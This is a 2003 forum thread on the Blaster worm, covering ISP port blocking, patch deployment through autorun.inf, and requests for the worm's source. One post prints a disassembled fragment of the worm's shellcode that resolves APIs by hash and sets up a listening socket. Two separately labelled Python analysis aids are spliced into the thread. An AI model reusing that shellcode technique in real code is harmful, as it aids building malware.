-
August 14th, 2003, 10:13 PM
#71
Member
Anyone with access to BBC 1, looks like they are going to do a piece on msblast in a few mins on the news
-
August 14th, 2003, 11:02 PM
#72
Anyone with access to BBC 1, looks like they are going to do a piece on msblast in a few mins on the news
bugger... missed it...!!!
Checking my firewall logs this morning.. yeah it is 8am here.. absolutely no hits on port 135, 69, 137 in the last 2.5 hrs.. get the feeling the ISP is blocking those ports.. I wonder how many others are doing the same..
Cheers
"Consumer technology now exceeds the average person's ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
August 14th, 2003, 11:26 PM
#73
I use two ISPs... as of 06.00 GMT today (14 August) FreeUK appeared to be doing this. My other one (Tiscali) was not, and I was getting a lot of hits up until about 2 hours ago (21.30 hrs GMT).
I did post (and got told off for!) the info that Lavasoft have an update for Ad-aware that detects this malware... also found a couple of other bad guys on my box, so it is worth the effort...
This is newer than my last Ad-aware update post BTW
Cheers
Johnno
-
August 14th, 2003, 11:42 PM
#74
What I've done is (for windows machines that don't need to use RPC, like my own machines at home) route port 135 through my router to an internal IP address that doesn't exist. In the VERY unlikely event that I got this thing, it wouldn't be able to communicate to the outside because the port it's trying to come back through would go to a null destination. Of course, mandatory updates on antivirus is already done as is updating Microsoft's OS line.
If anyone out there needs to automate the patching for a lot of windows machines, you can do this:
1: Download the Windows 2000 patch or the Windows XP patch. Save it to the desktop.
2: Rename said patch to patch.exe or something similar. It will make the next step easier.
3: Create a new file on the desktop called autorun.inf. Open it in notepad and put the following lines in:
Code:
[autorun]
open=patch.exe -o -f -u
4: Burn these two files to a cd. Because of the autorun.inf and Windows' inherent autoplay feature, the patch will automatically run. The -o means it will overwrite existing files, the -f means it will force all processes to die upon reboot signal, and the -u means it will be in unattended mode which makes life a lot easier for administrators running around trying to automate this process on dozens or more workstations.
Problem: it has to be run as administrator (or power users that can add patches to the system) so it's only a little better if you have dozens of regular standard user workstations.
We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
-
August 15th, 2003, 12:51 PM
#75
Junior Member
Just got my hands on the source code for the Blaster worm now.
Got it from a good friend in my mail some hours ago, so soon I'm gonna have some fun examining it and seeing how it's made
-
August 15th, 2003, 03:29 PM
#76
Junior Member
Grinler..anyone
I am trying to find a binary or source code source for the W32/Blaster to put it into our lab for testing. Unfortunately the gov. agency we support will not allow the Ops support staff to change any machine until in-house testing for effect is completed. Bureaucracy, ya gotta love it.
-
August 15th, 2003, 04:17 PM
#77
I got the binary but unfortunately do not have access to the computer it's stored on due to the power outage.
Zrekam, Mind sharing the source? Would love to take a look at it.
-
August 19th, 2003, 08:27 AM
#78
Junior Member
here is a snippet of the worm's exploit code:
<Snippet>
loc_4AF: ; CODE XREF: seg000:000004A8j
sub esp, 34h
mov esi, esp
call GetKernel32BaseAddy
mov [esi], eax ; EAX is the base address of kernel32.dll
push dword ptr [esi]
push 0EC0E4E8Eh ; corresponds to LoadLibraryA
call ScanForAPI
mov [esi+8], eax
push dword ptr [esi]
push 0CE05D9ADh ; WaitForSingleObject
call ScanForAPI
mov [esi+0Ch], eax
push 6C6Ch
push 642E3233h
push 5F327377h ; "ws2_32.dll" (the three pushes spell ws2_ / 32.d / ll\0\0)
push esp
call dword ptr [esi+8]
mov [esi+4], eax ; esi + 4 = HMODULE of ws2_32.dll
push dword ptr [esi]
push 16B3FE72h ; CreateProcessA
call ScanForAPI
mov [esi+10h], eax
push dword ptr [esi]
push 73E2D87Eh ; ExitProcess
call ScanForAPI
mov [esi+14h], eax
push dword ptr [esi+4]
push 3BFCEDCBh ; WSAStartup
call ScanForAPI
mov [esi+18h], eax
push dword ptr [esi+4]
push 0ADF509D9h ; WSASocketA
call ScanForAPI
mov [esi+1Ch], eax
push dword ptr [esi+4]
push 0C7701AA4h ; bind
call ScanForAPI
mov [esi+20h], eax
push dword ptr [esi+4]
push 0E92EADA4h ; listen
call ScanForAPI
mov [esi+24h], eax
push dword ptr [esi+4]
push 498649E5h ; accept
call ScanForAPI
mov [esi+28h], eax
push dword ptr [esi+4]
push 79C679E7h ; closesocket
call ScanForAPI
mov [esi+2Ch], eax
xor edi, edi
sub esp, 190h
push esp
push 101h
call dword ptr [esi+18h] ; WSAStartup returns 0 if successful
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax ; call wsasocketa
</Snippet>
This is just a little bit of the blaster worm, the rest of the code I am not allowed to reveal.
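Added example, not code from the thread or from the worm: the constants pushed before each call to ScanForAPI above are export-name hashes, and an analyst annotating such a listing can recover the names by recomputing the hash over a list of candidate exports. This assumes the ROR-13 export-name hash (the LoadLibraryA and ExitProcess constants on the page reproduce under it); the functions ror13, resolve and annotate and the candidate list are my own.

```python
import re
from typing import Optional

# Export names to try: the ten named in the snippet plus two common kernel32
# exports. This candidate list is my own, not a table taken from the worm.
KNOWN_APIS = [
    "LoadLibraryA", "WaitForSingleObject", "CreateProcessA", "ExitProcess",
    "WSAStartup", "WSASocketA", "bind", "listen", "accept", "closesocket",
    "GetProcAddress", "CreateThread",
]

def ror13(name: str) -> int:
    """ROR-13 export-name hash: h = ror32(h, 13) + byte for each byte, h starting at 0."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 13 in 32 bits
        h = (h + b) & 0xFFFFFFFF
    return h

# hash constant -> export name, built once from the candidate list
HASH_TABLE = {ror13(n): n for n in KNOWN_APIS}

def resolve(h: int) -> Optional[str]:
    """Name for a hash constant seen in a listing, or None if no candidate matches."""
    return HASH_TABLE.get(h & 0xFFFFFFFF)

# MASM-style immediate as printed by the disassembler: hex digits followed by 'h'
PUSH_IMM_RE = re.compile(r"\bpush\s+([0-9A-Fa-f]+)h\b")

def annotate(listing: str) -> list:
    """Return (hash, name) for every 'push <imm>h' whose immediate is a known hash."""
    found = []
    for line in listing.splitlines():
        m = PUSH_IMM_RE.search(line)
        if m is None:
            continue
        value = int(m.group(1), 16)
        name = resolve(value)
        if name is not None:
            found.append((value, name))
    return found

# Constructed excerpt: three lines copied from the snippet above
SAMPLE_LISTING = """\
push 0EC0E4E8Eh ; corresponds to LoadLibraryA
push 73E2D87Eh ; ExitProcess
push 101h
"""
```

Running annotate over the full snippet tags each ScanForAPI argument; the 101h pushed for WSAStartup's version word is correctly left alone because it matches no candidate.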
-
August 20th, 2003, 10:42 AM
#79
Originally posted here by Und3ertak3r
Noticed an increase in scans on the netbios ports, 137 in particular, as well almost matching the 135? coincidence?
Cheers
I've started getting hits, just like blaster on port 137 at around 8.00pm UTC last night & at the rate of every 10/15 mins.
Anyone know what this is?
<edit>
Actually the starting time may be wrong, but I'd still like to know what this is
</edit>
IT, e-commerce, Retail, Programme & Project Management, EPoS, Supply Chain and Logistic Services. Yorkshire. http://www.bigi.uk.com
-
August 28th, 2003, 10:20 AM
#80
My ISP has decided to UN-Block Port 135..
My firewall log is full of "Block TCP packet on port 135" .. this restarted sometime yesterday (local time) and the Port 135 probes here are as bad as during the 11th and 12th.. I don't want to exaggerate.. it seems at the moment to be worse.. but.. I didn't run my system 24/7 at that time..
I have taken the steps of advising the ISP, and asking why they removed the block, also asking that it may be prudent to re-block port 135..
and just for their records I supplied a short extract from my logs (about 5k).. that should give them enough food for thought.. or at least some emailing to the users of those systems "You are infected" warnings.. Most of the IPs are from within their domains.. ie 144.134.XXX.XXX
I wonder how many other ISPs have decided to unblock that port.. certainly shows (from here) the infection is still rampant..
Cheers
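Added example (not from the thread): a small parser for firewall-log lines like the "Block TCP packet on port 135" entries described above. It tallies the ports the thread watches (135, 69, 137) and groups the probing sources by /16, so the share of probes coming from the ISP's own range can be read off before sending them the extract. The line format, timestamps and addresses are constructed, 144.134.0.0/16 is assumed to stand for the ISP's range, and the function names are my own.

```python
import re
from collections import Counter

# Ports the thread watches; the short labels are mine.
WORM_PORTS = {135: "RPC/DCOM", 69: "TFTP", 137: "NetBIOS-NS"}

# Constructed line format: timestamp, the block message the poster quotes, source address.
LINE_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) Block (TCP|UDP) packet on port (\d+) from (\d+\.\d+\.\d+\.\d+)$"
)

# Constructed sample log; 144.134.x.x stands in for the ISP's own address range.
SAMPLE_LOG = """\
2003-08-27 14:02:11 Block TCP packet on port 135 from 144.134.12.7
2003-08-27 14:02:15 Block TCP packet on port 135 from 144.134.88.201
2003-08-27 14:03:02 Block TCP packet on port 135 from 203.0.113.45
2003-08-27 14:03:40 Block UDP packet on port 137 from 144.134.3.19
2003-08-27 14:04:05 Block TCP packet on port 135 from 144.134.200.6
2003-08-27 14:04:30 Block UDP packet on port 69 from 198.51.100.9
2003-08-27 14:05:12 Block TCP packet on port 80 from 198.51.100.23
this line is not a firewall event and is skipped
"""

def parse(log: str) -> list:
    """Return (timestamp, proto, port, src) tuples; lines that do not match are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, proto, port, src = m.groups()
            events.append((ts, proto, int(port), src))
    return events

def hits_per_port(events) -> Counter:
    """Count blocked packets on the worm-related ports only."""
    return Counter(e[2] for e in events if e[2] in WORM_PORTS)

def sources_by_prefix(events, port: int, octets: int = 2) -> Counter:
    """Group the sources probing one port by their leading octets (2 gives a /16 view)."""
    return Counter(".".join(e[3].split(".")[:octets]) for e in events if e[2] == port)

def share_from_prefix(events, port: int, prefix: str) -> float:
    """Fraction of probes on a port that come from a prefix such as '144.134'; 0.0 if none."""
    by_prefix = sources_by_prefix(events, port)
    total = sum(by_prefix.values())
    return by_prefix[prefix] / total if total else 0.0

if __name__ == "__main__":
    print(hits_per_port(parse(SAMPLE_LOG)), share_from_prefix(parse(SAMPLE_LOG), 135, "144.134"))
```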